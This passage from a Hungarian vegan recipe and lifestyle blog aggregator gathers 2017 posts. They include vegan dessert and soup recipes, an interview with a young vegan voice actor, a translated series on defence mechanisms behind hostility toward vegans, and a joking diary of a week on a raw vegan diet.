a vegánok is nyugodtan fogyaszthatják. A Veganz márka termékeit a Sparokban és Müller üzletekben találjuk meg, kínálatukban minden vegán. Nem mondható olcsónak, egy tábla csoki 600-700 Ft, cserébe nagyon finomak. Vegán gumicukrok – Áruk nagyon változó, de szerencsére már nagyon sok helyen lehet őket kapni. A fenti képet Tudatos Metropolita készítette, akinek az oldalán még több ötletet találtok hétköznapi üzletekben kapható (de gyakran pálmaolajos) termékekhez! https://tudatosmetropolita.blogspot.hu/2016/12/vegan-level-mikulasnak.html Déli gyümölcsök, illetve alma is tehető a csomagba. Egy pár mandarin egyébként is szokott lenni a hagyományos mikuláscsomagokban, ezzel most sem lehet mellényúlni. Természetesen rengeteg más opció van még a boltokban, hozzászólásban írd meg a te kedvenceidet! Kellemes ünnepeket! The post Mi kerüljön a vegán mikuláscsomagba? appeared first on VegaNinja.
Almás pite (laktózmentes, vegán)
2017. december 1. Zizi kalandjai
Olyan népszerű lett a közösségi média felületeken megosztott almás pite fotója és többen követeltétek a fotó hatására a receptet, így gondoltam, hogy megosztom veletek itt a blogon. Annyira, de annyira egyszerű a recept és olyan gyorsan készen van egy kis trükknek köszönhetően, a látvány pedig levesz mindenkit a lábáról. Mentsétek el a receptet, mert karácsonykor szerintem jól fog mutatni egy ilyen desszert az asztalon.
A recept gyorsaságának a titka a Tante Fanny édes linzertészta. Ennek köszönhetően készül el nagyon gyorsan! A jó hír, hogy a tészta vegán, így vegánok és laktózérzékenyek is használhatják sütemények készítéséhez. Sajnos a Tante Fannynak nem minden tésztája kapható minden szupermarketben (weboldalon meg tudjátok nézni, hogy ez az édes linzertészta például hol szerezhető be). Érdemes a tésztából kettőt beszerezni, ha szeretnétek szép mintákat is szaggatni a pite tetejére. Attól függően, hogy mekkora formába teszitek, lehet, hogy egy csomag tészta elég lesz a pite aljának és tetejének elkészítésére is, de ha nagyobb formába teszitek, akkor szükség lesz a második csomagra is. A megmaradt tésztából pedig szaggathattok különböző formákat, süssétek meg és kekszként megehetitek, akár úgy is, hogy két kekszet lekvárral ragasztotok össze.
Almás pite (laktózmentes, vegán) Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 20 perc Teljes idő 30 perc Villámgyorsan elkészülő, finom almás pite. Szerző: Zizi Recept típusa: sütemény Konyha: vegán Adag/mennyiség: 4-6 főre Hozzávalók 1 vagy 2 csomag Tante Fanny édes linzertészta 2-3 db alma, kimagozva, vékony szeletekre vágva őrölt fahéj őrölt vanília szeletelt mandula frissen facsart citromlé agavé szirup (opcionális) kókuszolaj Elkészítés A sütőt melegítsük elő 180C fokra. Az almaszeleteket locsoljuk meg egy kevés citromlével, hogy ne barnuljanak meg. Kinyújtjuk a tésztát és beletesszük egy kerek kiolajozott, sütőpapírral bélelt pite formába. A tészta szélét, ha túl nagy és kilóg a formából, akkor vágjuk le. A tésztát villával szurkáljuk meg néhány helyen. Betesszük a sütőbe és 10-15 percen keresztül elősütjük úgy, hogy sütőpapírt teszünk a tésztára és valami nehezéket a sütőpapírra (száraz lencsét vagy babot), hogy a tészta ne emelkedjen fel. Ha félig megsült a tészta, kivesszük a sütőből és az almaszeleteket szépen körbe rátesszük a tésztára, megszórjuk fahéjjal, vaníliával, egy kevés agavésziruppal és szeletelt mandulával. A maradék tésztából (vagy ha nem maradt, akkor egy új csomagot felbontva) csillag formákat szaggatunk rá. Tegyük vissza a sütőbe és légkeveréses programom 180C fokon süssük kb. 20-25 percen keresztül, amíg a teteje is enyhén megbarnul és az almák elkezdenek megpuhulni, kicsit levet ereszteni. Jegyzetek Az agavé szirup el is hagyható, mert a linzertészta be van édesítve, az almák pedig édesek, tehát anélkül is nagyon finom. Az almaszeletek tetejére a szeletelt mandulán kívül aprított diót is tehetünk. 3.5.3229
sütőtökös kókuszkocka
2017. november 29. Beautilicious
Amikor két étel közül nem tudom eldönteni, hogy melyiket kívánom jobban, kombinálom a kettőt. Így született hát sütőtökös kókuszkocka is. hozzávalók - 5ek kókuszliszt - 5ek zabliszt - 2ek bambuszrost liszt - 6 tojás - 150gr sült sütőtök - 6+3 ek édesítőszer - 500ml kókusztej - fél zacskó sütőpor - 5ek kakaópor - kókuszreszelék a forgatáshoz így készítsd - Keverd össze a liszteket 6ek édesítővel, sütőporral, majd add hozzá a sütőtököt - Válaszd ketté a tojásokat, a sárgáját tedd félre, a fehérjét verd habbá - A habbá vert fehérjét forgasd a lisztes keverékhez - Süsd ki a piskótát 30perc alatt - Készítsünk csoki szószt: Vegyük elő a tojássárgáját, és keverjük el 3ek édesítővel, és 5ek kakaóporral, majd öntsük fel a tejjel, és 5perc alatt főzzük fel - A kókuszreszeléket öntsük ki egy tálba - A piskótát kockázzuk, majd a csokiszószba forgatjuk, aztán mehet a kókuszreszelékbe
Illatos gesztenyés szaloncukor
Ehhez a bejegyzéshez a világ legegyszerűbb szaloncukor receptjét kerestem, illetve a második legegyszerűbbet, mert a legeslegegyszerűbb már foglalt, azt a szaloncukorkészítő tanfolyamon készítjük el másik öt fajtával együtt. ;) Már második éve tartok ilyen kézműves tanfolyamokat közvetlenül karácsony előtt, és nagyon szeretitek, általában már hónapokkal előtte elkel a helyek nagy része. Egy-kettő azért szokott maradni, érdemes megnézni a tanfolyami oldalt. :) Na, szóval itt van a világ második legegyszerűbb szaloncukor receptje, amit nem kell sem vágni, sem darálni, sem főzni, sem fagyasztani, sem szitálni, sem válogatni, sem magozni, sem szárítani, sem turmixolni. Csak gyurmázni kicsit, aztán pedig jöhet a csokizás. :) A saját szaloncukor pedig fantasztikus dolog, sokkal, de sokkal finomabb, mint bármilyen bolti, és az egyik legszebb karácsonyi ajándék is, amit elképzelni lehet. További karácsonyi ajándékötletekért ide kattints: Karácsonyi AJÁNLAT A recept Hozzávalók 15-16 db szaloncukorhoz: - 240 g gesztenyemassza - 1 narancs héja - 100 g étcsoki - ízlés szerint: porcukor, rumaroma - A gesztenyemasszát ízlés szerint édesítsd és ízesítsd rumaromával. A legtöbb gesztenyemassza egyébként már eleve így kapható, és ez most ennél a receptnél nem is lesz baj, sőt. Kóstold meg a masszát, számítsd hozzá, hogy a csoki is tovább édesíti majd, így valószínűleg ezt a lépést teljesen ki is hagyhatod. - A másik beállítandó dolog, a megfelelő állag. Ha túl száraznak találod a masszát, olyannak, ami nem marad egyben, akkor minimális víz hozzáadásával könnyen tudsz rajta javítani. Pl. nedves kézzel gyúrd át. Vigyázz, mert tényleg nem kellhet bele sok. - Ha már elégedett vagy a gesztenyegyurmáddal, reszeld bele a masszába a narancshéjat, és jól dolgozd össze. Ezután formázz belőle szaloncukrokat. Készíts két ujjpercnyi hurkácskákat, majd ezeket nyomd rá egy sima felületre. Így az alja olyan igazán szaloncukrosan lapos lesz, és könnyen megáll majd. - A mártáshoz a csokoládét olvaszd meg gőz fölött. Jó ötlet meredek falú tálat használni, hogy minél mélyebb legyen a csokoládé, és ne az edény falára kenődjön fel a nagy része. Két villa segítségével forgasd bele a gesztenyerudakat. Jól csepegtesd, rázogasd le róla a felesleges csokit, majd tedd a szaloncukrokat sütőpapírra szilárdulni. Extra tipp : sütőpapírba, színes selyempapírba csomagolva kapja meg a tökéletes ünnepi jellegét. Jó étvágyat! Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Karácsonyi AJÁNLAT Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Illatos gesztenyés szaloncukor appeared first on Kertkonyha.
Vegán kókuszkocka (tej- és tojásmentes)
2017. november 19. Élj harmóniában
A tojásmentesség alap az édességeimnél és ugyan mi fogyasztunk tejterméket - erről már régebben írtam, hogy mi az ájurvéda álláspontja a tejfogyasztásról ( a cikket dr. Frawley tollából itt olvashatod) - de sokszor készítek vegán édességeket. A mai is ilyen nap volt, a klasszikus, finom kókuszkockát szerettem volna vegán módon elérhetővé tenni a családom számára. Általában mindent szeretünk ami kókuszos, így a kókuszkocka is nagy kedvenc.:) Hozzávalók piskóta Vegán kókuszkocka (tej- és tojásmentes)25 dkg teljes kiőrlésű tönkölybúzaliszt vagy búzaliszt 25 dkg fehér tönkölybúzaliszt vagy búzaliszt 18 dkg teljes értékű nádcukor 8 dkg kókuszzsír 1 csg. sütőpor vanília 4 dl mandulatej vagy rizstej fél citrom héja csokoládés réteg 10 ek kakaó 10 dkg kókuszzsír 15 dkg nádporcukor 3 dl mandulatej vagy rizstej külső réteg 25 dkg kókuszreszelék Vegyszermentes (bio) alapanyagokat használj! Tedd a tészta száraz hozzávalóit, keverd jól össze, majd tedd hozzá a kókuszzsírt és a mandulatejet is. Keverd össze lágy mozdulatokkal és öntsd sütőpapírral bélelt tepsibe. 180 fokon süsd készre (kb 30 p), amjd hagyd kihűlni. A kihűlt piskótát vágd fel. A csokoládés réteg hozzávalóit keverd össze egy edénybe és főzd fel. A forró csokoládésba mártogasd bele villával a piskótakockákat, majd forgasd bele kókuszreszelékbe.
Krumplileves – gourmet változat
Krumplileves. Erre mondják, hogy tipikusan olcsó, pórias, elég egyszerű étel. Persze imádom meg minden, de mégsem egy királyi lakoma. Pedig tényleg lehet ezt is menő módon csinálni. Úgy képzelem, a Michelin-csillagos éttermekben készíthetik így a krumplilevest. :) Édeskés, fűszeres, illatos és könnyed, de az ízekben megkapja a mélységét. És még a gyönyörű színe sem Photoshop! :) Hozzávalók 2-3 adaghoz: - 3 közepes krumpli - 1/2 sárgarépa - 1/2 vöröshagyma - 5 ek fehérbor - 1 ek citromlé - 1 körömnyi citromhéj (csak a sárga) - 1 mk reszelt gyömbér - 1 csipet rozmaring (ha van, friss) - 2 ek olívaolaj - 3 mk só - A felaprított hagymát az olajon pároljuk meg. Közben hámozzuk meg és vágjuk kis kockákra a krumplit, vékony szeletekre a répát. Lehet nagyra is vágni, csak akkor lassabban fő meg. - Dobjuk a hagymára a krumplit és a sárgarépát, ízesítsük gyömbérrel, citromhéjjal, a fehérborral, és sózzuk is meg. Öntsük fel annyi vízzel, ami ellepi, és főzzük puhára a zöldségeket. - Mielőtt elzárnánk, keverjük el benne a rozmaringot, és hagyjuk kicsit bugyogni őket együtt is. - Amikor kész, turmixoljuk simára a levest. Kis citromlé segít még a rafinált ízek kihozásában. Extra tipp : mielőtt a főzéshez kezdenénk, teszteljük, hogy a gyömbér és a borunk illata harmonizál-e egymással. Ha nem, akkor a levesben sem alkotnak majd jó kombinációt, ezért inkább csak az egyiket használjuk. Jó étvágyat! Elkészítési idő: 15 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Karácsonyi AJÁNLAT Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Krumplileves – gourmet változat appeared first on Kertkonyha.
Gyors, fűszeres, zabpelyhes pogácsa (tej-, tojás- és élesztőmentes)
2017. november 10. Élj harmóniában
Sokszor készítek a jógás tanulóimnak különböző programokra mindenféle finomságot. Mivel tudom nem mindenki édesszájú, általában mindig sütök az édes finomságok mellé valami sós csemegét is. Ma lesz a Gyertyafényes Halloween Jógagyakorlás és utána mint mindig, bio finomságokkal vendégeljük meg a jógázókat:) Ezen alkalomból ma egy nagyon gyorsan elkészíthető, kanállal szaggatható fűszeres pogácsafélét készítettem. Hozzávalók 50 dkg graham liszt Fűszeres, zabpelyhes pogácsa (tej-, tojás- és élesztőmentes) 12 dkg zabpehely 1 csg sütőpor 1 csipet szódabikarbóna 1/2 csésze olaj (repceolaj vagy olívaolaj) 1 tk. szárított bazsalikom 1 tk. szárított oregánó 1 tk. szárított kakukkfű 1/2 tk. szárított rozmaring só fekete bors víz (kb egy csésze) Vegyszermentes (bio) alapanyagokat használj! Tedd a hozzávalókat egy tálba és jól keverd össze. Majd annyi vizet tegyél hozzá, hogy, egy lágy, könnyed tésztát kapj. Kanál segítségével formázz egy sütőpapíros tepsire kis pogácsákat. 180 fokra előmelegített sütőben süsd készre. (kb. 15-20 perc)
csokihab
2017. november 8. Beautilicious
Percek alatt finom fehérjedús és szénhidrátmentes nasi. Hozzávalók - 2tojás - 2ek kakaópor - 2ek édesítőszer - 50ml kókusztej Így készítsd - A tojásokat válaszd ketté - A sárgáját főzd meg a kakaóporral, tejjel és az édesítőszerrel - A fehérjét verd fel kemény habbá - Ha kihűlt a sárgája, keverd hozzá a habot, és készen is vagy
Z generációs vegánok – interjúsorozat, 3. rész: Laudon Andrea
2017. november 3. Zizi kalandjai
A social medianak hála egyre több olyan tizen-huszonéves fiatallal találkozom, akik tudatosak, figyelnek a környezetvédelemre és vegánok lettek. Ők nem egy trendre ülnek fel, hanem tényleg komolyan gondolják ezt az egészet. Ilyen fiatalon megváltoztatják az életüket, a social median keresztül megosztják tapasztalataikat, bátorítják a hasonló korú fiatalokat, akik érzik, hogy változtatni szeretnének, de nem tudják, hogy induljanak el. Mi a titkuk? Hogyan lesznek olyan lenyűgözően természetesek? Ezt szeretném nektek bemutatni ezzel a sorzattal. Fogadjátok szeretettel harmadik interjú alanyomat, Laudon Andreát!
Andi már az Y generáció tagja, viszont az interjút tizen-huszonéves fiatalakkal készítem, így ő is benne van ebben a huszonéves kategóriában. Andit személyesen még nem ismerem, nem találkoztunk, bár a social medianak hála már olyan mintha picit ismerném! A személyes ismerkedésre egy nap biztosan sor kerül majd.
Bemutatnád magad röviden?
Sziasztok, Laudon Andi vagyok, 24 éves, főként szinkronizálással foglalkozom, emellett cikkeket írok, videózom, és lassan két és fél éve vagyok vegán.
Hogyan fogadta a környezeted (szülők, nagyszülők, barátok, osztálytársak), amikor bejelentetted, hogy vegán leszel/lettél?
Nem volt olyan hatalmas bejelentés, inkább csak közöltem, hogy nem fogyasztok többé állati eredetű ételt, de mivel elvégeztem egy sport táplálkozás kurzust, már vegánként, és mindennek nagyon utánaolvasok, tudták, hogy nem szenvedek majd hiányt semmilyen tápanyagban.
Mi volt a motivációd a váltásra?
Eleinte egészségügyi és környezetvédelmi, de a későbbiekben már ez kibővült az állatok szeretetével és védelmével természetesen.
A váltás egyik napról a másikra történt vagy szakaszokban (pl. először vegetáriánus lettél és utána vegán)?
Szinte baba korom óta vegetáriánus vagyok, egyszerűen nem ettem meg a húst, ha elémrakták, egy két nagyon feldolgozott például “dínóhusit” ettem egy ideig, de ezeket inkább ipari hulladéknak titulálnám. Először egy 30 napos vegán kihívás Facebook csoporttal kezdtem el a dolgot, akkor néha még ettem főtt tojást vagy feta sajtot, de mivel nagyon nem esett jól, ezeket is elhagytam.
A vegán étrend egyfajta tudatosságot is hoz az embernek. Te mire figyelsz oda az egészségedet illetően a vegán étrend miatt (pl. szedsz-e vitamint, több vizet iszol, sportolsz, stb.)?
Az egyetlen vitamin, amit szedek, ha éppen eszembe jut, az a B12, azt is spray formában. Ezen kívül heti 6x mozgok, jógázom, edzőtermi edzést végzek. Sokat iszom, és odafigyelek, hogy tejles értékű, minél feldolgozatlanabb ételeket egyek. Például egy tökéletes ebéd számomra fél avokádóból guacamole, barna rizs, lencse és saláta. Szeretem az egyszerű, tiszta ízeket.
Hogyan érzed magad vegánként (egészségügyi, lelki szempontból)?
Sokkal több energiám van, tisztább a fejem, a gondolkodásom. Az anyagcserémmel nincs gond, amivel volt régen, és sokkal könnyebbnek érzem magam. Plusz amióta vegán vagyok jobban érzem spiritálisan is, hogy a helyemen vagyok, jobban egynek érzem magam a világgal, univerzummal, ha fogalmazhatok így.
Okozott-e problémát valaha a vegán étrend, életmód (pl. nem lehet vegán ételt kapni a suliban, egyetemen, az állandóan kíváncsiskodók kérdéseinek a megválaszolása, stb.)?
Nem volt ilyenre példa, főleg, ha már az ember tudja, miket szokott enni, hogyan kombinálja az ételeket, ha étterembe megy. Bármilyen helyen lehet vegánként finomat enni, én legutóbb egy csárdában ettem hihetetlenül finom fűszeres burgonyát sült zöldségekkel, isteni volt. Előtte pedig rákérdeztem, vajjal vagy olajjal készítik-e, allergének miatt, bátran kérdezgessetek rá ezekre, hogy biztosak legyetek a dolgotokban.
Melyik az az étel, ami olyan “guilty pleasure” féle, vagyis nem túl egészséges (még vegán formában sem), de mégsem tudsz neki alkalmanként ellenállni?
Hű, van egy tengeri sós-balzsamecetes csipsz, igazából most is éppen azt eszem, nagyon szeretem, és a házi készítésú vegán sajtos pizza sok hagymával. Sosem lehet betelni vele. De hogy az édességet se hagyjuk ki, a vaníliás vegán fehércsoki is nagy szerelmem.
Melyik a kedvenc vegán ételed?
A fent említett pizza, és a málnás-mandulatejes-diós-juharszirupos zabkása reggelire.
Mit üzensz azoknak a fiataloknak, akik szeretnének áttérni a vegán étrendre, de még nem tették meg ezt a lépést? Valamint azoknak a szülőknek, akik aggódnak a vegán étrendre áttért gyermekükért?
A fiataloknak azt üzenem, hogy csilliárdszor jobban érzem magam a bőrömben vegánként, és a Földünk jövője csakis a mi kezünkben van, ezért legyenek nyitottak, próbáljanak ki vegán ételeket, rengeteg szuper recept van és sok vegán hely is nyílik mostanában! Inspirálódjanak videókból, és nézzenek utána a dolgoknak! A szülőknek pedig csak annyit mondhatok, ha a gyerkőce vegán szeretne lenni, hallgassa meg, támogassa, és aztán csatlakozzon hozzá ő is! Összeségében a vegánságot korosztálytól, nemtől függetlenül mindenkinek ajánlom! Tájékozodjatok, rengeteg szuper film van, mint a Cowspiracy, Earthlings, próbáljatok ki vegán recepteket, csináljatok több napos, hetes vegán kihívásokat! Nekem a Mit ettem ma? videók is sokat segítenek inspirálódni, az én csatornámon is több ilyet megtaláltok. Szóval legyetek nyitottak, és csak vágjatok bele! Életem egyik legjobb döntéseként könyvelem el azt, hogy vegán lettem. Ha bármilyen kérdésetek van, bátran írjatok nekem!
Andit megtaláljátok:
Instagramon: @andilaudon
Facebookon: Soulshine By Andi
Youtube-on: @SoulshineByAndi
Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 6. rész
Volt már minden: reakcióképzés, az izoláció, racionalizáció, hipochondria, intellektualizáció, a hatodik, egyben utolsó része a cikksorozatunknak a tagadás. Ugye, te is tudod, mire gondolok? Mindjárt kifejtem, olvass tovább! Fordítás a következő cikkről: http://veganchowhound.com/rants/people-hate-vegans-freud-could-explain-why/ Fordította: Kertész Tibor hirdetés Tagadás “Az ipari állattartásban előforduló állatkínzások egyedi, elszigetelt esetek, nem ezek a jellemzőek.” “Az állatok nem éreznek akkora fájdalmat, félelmet és szenvedést, mint az emberek.” “Az ipari állattartás nem járul hozzá a föld megmérgezéséhez.” “A húsukért tenyésztett marhák nem bocsátanak ki hatalmas mennyiségű metánt, amely hozzájárul a globális felmelegedéshez. Ja amúgy igazából a globális felmelegedés sem létezik.” “A hús nem tartalmaz mindenféle növekedési hormont és antibiotikumot.” “Hús nélkül nem lehet életben maradni, a hús szükséges a túléléshez és az egészséges élethez.” Mit mond erről a Wikipédia? “A tagadás a zavaró érzések, impulzusok, vágyak jelentéktelenítése és aktív kiutasítása a tudatból. Ezután csak annyi nyoma marad, ha netán ezek létét valaki szóba hozza, azt igazságtalan vádként éli meg az egyén, és ez dühöt vált ki benne. A tagadás távolságot tart az egyén és élményei között, de nem old meg problémákat.” Könnyű gyűlölni a vegánokat, amikor folyamatosan felszínre hozzák ezeket az elfojtott érzelmeket és gondolatokat. Nyilvánvaló, hogy sokkal több ilyen elhárító mechanizmust és egyéb okot fel lehetne még sorolni, de néhány, vegánokat érintő gyűlölködési okot tisztáztunk. Mindezek ellenére javul a helyzet. Csakúgy, mint a más társadalmi kérdésekben, a veganizmus és fajizmus kérdésében is folyamatos a fejlődés, nagyobb, mint eddig bármikor. Azt mondják, hogy a közösségi média, mint például a reddit, egyre jobban támogatja a dolgot. A nyilvánosság véleménye is folyamatosan javul a vegánokról. Mi az a fajizmus? Kattints ide! 1. rész | 2. rész | 3. rész | 4. rész | 5. rész | 6. rész The post Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 6. rész appeared first on VegaNinja.
Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 5. rész
Az első négy részben a reakcióképzésről, az izolációról, racionalizációról és a hipochondriáról volt szó, az ötödik lehetséges oka annak, hogy az emberek nem szeretik a vegánokat (és vegetáriánusokat), az az intellektualizáció. Mit is jelent ez? Fordítás a következő cikkről: http://veganchowhound.com/rants/people-hate-vegans-freud-could-explain-why/ Fordította: Kertész Tibor hirdetés Intellektualizáció Hallottál már valakit órákig mesélni arról, hogy az állatok szenvedése filozófiailag helyénvaló? Amikor valaki csak a kellemetlen dolgot körülvevő fogalmakra koncentrál azért, hogy igazi problémát elkerülje, az az intellektualizáció. Az emberek csak ködösítenek és mindenféle hülyeséget beszélnek össze-vissza egészen addig, amíg már nem érzik bűnösnek magukat és persze tovább csinálják amit csak akarnak. A sületlen filozófiai érveket használó emberek leereszkedőek és ellenségesek lehetnek. Sokan közülük gyűlölik a vegánokat. A Wikipédia így ír az intellektualizációról: “Célja: érzelmi eltávolodás a kellemetlen érzés, gondolat okozta stresszhelyzettől. Lényege, hogy a személy a fenyegető dolgokról hideg, tárgyilagos, tudományoskodó módon kezd el gondolkozni, így az ahhoz kapcsolódó érzelmeket eltávolítja tőle ezzel távol tartva magát a szorongástól.” Volt valaki, aki azt mondta nekem, hogy az állatok nem érző lények. Nem éreznek fájdalmat. Az emberek képesek Nietzschének képzelni magukat, csak hogy elkerüljék az igazságot. Olyan érvet is hallottam már, hogy Ez az ő valóságuk, nem foszthatod meg őket ettől! De persze ő sem gondolta komolyan, hogy pl. egy embergyereket is világra lehetne hozni azzal a céllal, hogy aztán használati tárgy, vagy hamburger legyen belőle, csak mert neki onnantól kezdve ez a valósága. 1. rész | 2. rész | 3. rész | 4. rész | 5. rész | 6. rész The post Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 5. rész appeared first on VegaNinja.
spenótos hagymás sütőtök saláta
2017. október 27. Beautilicious
Nincs is jobb dolog az őszben, minthogy sütőtök szezon van. Sütőtököt imásjuk sósan is, édesen is, sütiben és salátában is. Most utóbbira hoztam nektek egy elképesztően finom alternatívát. Hozzávalók - 500gr sütőtök - 450gr spenót - 3gerezd fokhagyma - 1 fej lilahagyma Így készítsd - A sütőtököt tegyük sütőbe, és süssük készre - A hagymákat olívaolajon dinszteljük meg, majd öntsük rá a spenótot - Pároljuk 10 percig, majd vegyük le a tűzről - Ha megsült a sütőtök vágjuk kockákra és adjuk a spenóthoz
Egyélmeg teasüti
Omlós, puha teasüti természetes cukrokkal, gluténmentesen Nehogy elhidd, amit az cím elolvasása után gondoltál! Ez igenis egy vérbeli, házias teasüti, abbahagyhatatlan, letehetetlen és teljesen hagyományos ízű! Pedig nincs benne se búzaliszt, se a mazsolán és sütőtökön kívül egyéb cukor, bár ez utóbbit azért nem teljesen tudtam megállni, mert megküldtem egy kanál nádcukorral a tetejét, hagy ropogjon a fogam alatt. :) De ennyi az egész, és még az is elhagyható. Aztán kortyolgassatok hozzá teát vagy egy jófajta kávét. Happy Halloween! :) Hozzávalók 20-25 darabhoz - 90 g rizsliszt - 80 g margarin - 60 g mandula - 50 g sütőtök (sült) - 50 g mazsola - 1 mokkáskanál őrölt fahéj - 2 csipet só - A mazsolát forrázzuk le, és amíg ázik, készítsük elő a többi alapanyagot. - Késes aprítóban a mandulát daráljuk össze a riszliszttel, a fahéjjal és a sóval, majd szórjuk abba a tálba, amiben elkészítjük a tésztát. - Az aprítóba tegyük a sütőtököt, a lecsepegtetett mazsolát, és daráljuk össze ezeket is egymással. Ez fogja édesíteni a kekszünket, Ha szükséges, visszatehetünk 1-2 kanállal a lisztből, hogy jobban elkapja a penge a pépet. - A kapott masszát kaparjuk a lisztes tálba, adjuk hozzá a margarint is, és kézzel gyúrjunk mindent össze. Dolgozzunk gyorsan, ne olvadjon meg a margarin. - Tegyük be a tésztát a hűtőbe, és ezalatt készüljünk elő a sütéshez. 150 fokra kapcsoljuk be a sütőt, vegyünk elő tepsit és két sütőpapírt. - A tésztát két sütőpapír között nyújtsuk ki, majd éles késsel vágjuk téglalapokra. Nekem nagyon tetszik a kb. 3×6-os méret, de ettől persze te eltérhetsz. Villával óvatosan szurkáld meg, hintsd meg nádcukorral, és mehet is a sütőbe 15 percre. Jó étvágyat! Elkészítési idő: 25 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven Végezetül innen letöltheted a két ajándék receptgyűjteményt is. The post Egyélmeg teasüti appeared first on Kertkonyha.
Nyersvegán vezeklés - magvas gondolatok egy hét után
2017. október 24. Vegán muflon
Vegánnak lenni nem nehéz, kiváltképp, ha a lakhelyeden nem csak egy babaruha-turkálóval egybenyitott Reál vegyesbolt lelhető fel. Ennek ellenére mégis megkíván egy bizonyos szintű (ki)tartást, hogy ne csak az állattetemekről mondjál le következetesen, hanem mindennemű, állatból származó dologról is, és ha úgy hozza az élet, készen kell állnod néminemű kellemetlenkedésre. És ezzel máris egy erős érvet állítottam fel amellett, miért nem vagyok következetlen és puhány csótánymenyét, amiért már a kihívás első hetében belebuktam a 100%-ig nyersvegán étrend követésébe.
Első és legfontosabb tapasztalat: a nyers zöldség-gyümölcs-magvak képesek tartósan megadni a jóllakottság érzését anélkül, hogy tankhajónyi mennyiséget zabálnánk be belőlük. DE! És itt jön a bukás legfőbb oka: tapasztalataim szerint ehhez elengedhetetlen egy normális életritmus, amiben benne foglaltatik alsó hangon nyolc óra pihentető alvás. A fáradt szervezet ugyanis több kalóriabevitelért reklamál, a tartós éhségérzet pedig agresszióhoz és bunkó, tapló magatartáshoz vezet. (Meggyőződésem, hogy az olyan sorozatgyilkosok, mint Jeffrey Dahmer, Ted Bundy és Andrej Csikatilo is valaha normális, ám túlhajszolt emberek voltak, aztán egy napon alacsony szénhidrát diétára fogták őket.) Márpedig a magamfajta, vámpír-bioritmussal bíró egyedek számára az éjfél előtti alvás sci-fi, ráadásul az unalmasabb fajtából.
Második tapasztalat: már ennyi idő után is ki merem jelenteni, hogy ha gasztronómiailag nem is feltétlenül, egészségügyi szempontból a nyersvegánság a legideálisabb táplálkozási formula. Egy hét alatt nyilván nem lett belőlem Brad Pitt-fejű, jógaoktató testű kentaur, de azt határozottan állítom, hogy egy viszonylag kellemesen átaludt éjszaka után fizikailag és pszichikailag is jóval könnyebbnek éreztem a földi létet. És rohadtul nincs kétségem afelől, hogy a következetes és változatos nyersvegán étrend a létező legnagyobb, csiribunkó sallert jelenti az olyan betegségek számára, mint a rák.
Harmadik tapasztalat: A nyersvegánság zöldséggyümölcs-szezonban sem feltétlenül költséghatékony, nemhogy az ősz közepén. Ráadásul a rendelkezésemre álló szakirodalom gyakran olyan hozzávalókkal zsonglőrködik, mint maracuja, csíráztatott quinoa, málnaecet vagy misopaszta, azt azonban elfelejti, hogy operett- és feljelentgető házmesterország lakójához beszél. Márpedig itt a vagdalthús-konzerv és a lucskos káposzta az őshonos táplálék. És persze, talán a hasonlóan sznob komponensek nélkül is össze lehet állítani nyersvegán étrendet, de azt is jóval célszerűbb nyáron.
És végül: A néhány, előbb felsorolt negatívum ellenére sem tervezek 100%-ig felhagyni a nyersvegán kísérletezéssel a következő három hétben, csak éppen beleszövök minimálisan feldolgozott hozzávalókat is. Ilyen pl. a kisir nevezetű török cucc, ami a bulguron kívül kb. csak nyers hozzávalókból készül. Folyt. köv., ne kapcsoljon sehova!
almás fahéjas fonott kalács
2017. október 21. Beautilicious
Kiskorom egyik legkedvesebb emléke az ágyba reggeli mamitól. Ez sokszor kakaó volt kaláccsal, és hát ez az egyik gyengém, amit sose tudok megunni. Az az igazi foszlós kalács...hmm egyszerűen felülmúlhatatlan. Elkészítheted akár kakaós, diós, mákos töltelékkel is, de én most egy fahéjas ízre vágytam, és sikeresen visszahoztam a kiskori emlékeket ezzel a finomsággal. Hozzávalók - 150gr amaránt liszt - 75gr darált mandula - 25gr útifűmag héj - 50gr bambuszrost liszt - 25gr élesztő - 250ml tej - 80gr görög joghurt - 2 tojás - 80gr édesítő A töltelék: - 2alma - 100ml víz - fahéj Így készítsd - Az élesztőt futtasd fel a tejben - Keverd össze a száraz alapanyagokat, majd add hozzá a joghurtot, tojásokat és az élesztőt - Dagaszd a tésztát kb 5 percig - Tedd félre egy órárá meleg helyre - Addig a töltelékhez főzd meg az almát fahéjas vízben - Ha az alma megpuhult, akkor pépesítsd - Oszd a tésztát 3 részre, majd nyújtsd ki - Töltsd meg a töltelékkel, majd tekerd fel, úgy mint a csigát - Fond össze a három tésztát - Süsd előmelegített sütőben 180fokon 50 percig
Zöldturmix Fesztivál 2017 október
2017. október 19. Gitta nyersétel blogja
